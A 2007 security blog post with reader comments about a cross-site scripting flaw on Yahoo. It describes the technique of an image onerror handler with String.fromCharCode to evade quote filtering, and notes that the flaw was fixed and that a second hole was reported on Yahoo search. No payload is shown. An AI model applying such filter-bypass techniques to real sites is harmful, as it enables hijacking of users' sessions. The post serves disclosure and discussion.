Writeup on Yahoo XSS
Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross site scripting vulnerabilities. The attack we all know and love. It’s a pretty interesting philosophical take on the issue actually. It does get technical near the end, including a PERL script to generate the attack on the fly.
In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler in an image, and since it can’t use quotes it uses String.fromCharCode to evade that. Well done. Not really news, except the writeup is pretty interesting as it goes into a lot more detail about how the attack works than I typically do.
June 14th, 2007 at 6:39 pm
This was also posted by TX here: http://sla.ckers.org/forum/read.php?3,44,12494#msg-12494 (not sure who found it first)
June 15th, 2007 at 12:25 am
Very interesting though.
June 15th, 2007 at 2:27 am
…and it’s Slashdotted.
What’s interesting about being Slashdotted is that you get to see the current public opinion (really???
).
I found this thread interesting.
… and this one reminded that there’s still a lot to be done for awareness; and that’s where such flaws are welcome.
p.s. Did I just say “awareness-through-FUD”???
June 15th, 2007 at 8:57 am
did they fix it already? i tried clicking the link in both opera and firefox and got no alertbox or anything.
i just checked the source, i suppose they are escaping the quotes now.
June 15th, 2007 at 12:58 pm
fixed
September 21st, 2007 at 4:39 pm
This hole fixed, but there is another XSS hole at search.yahoo.com. Which I told about at my site (http://websecurity.com.ua/1372/). It is need to check holes (and whole fixed scripts) after fixing. Especially in case of XSS where are a lot of bypass techniques.
So Yahoo need to fix new hole in their search engine. And they need another Jeremiah Grossman to help them with security
Yahoo feel free to contact me.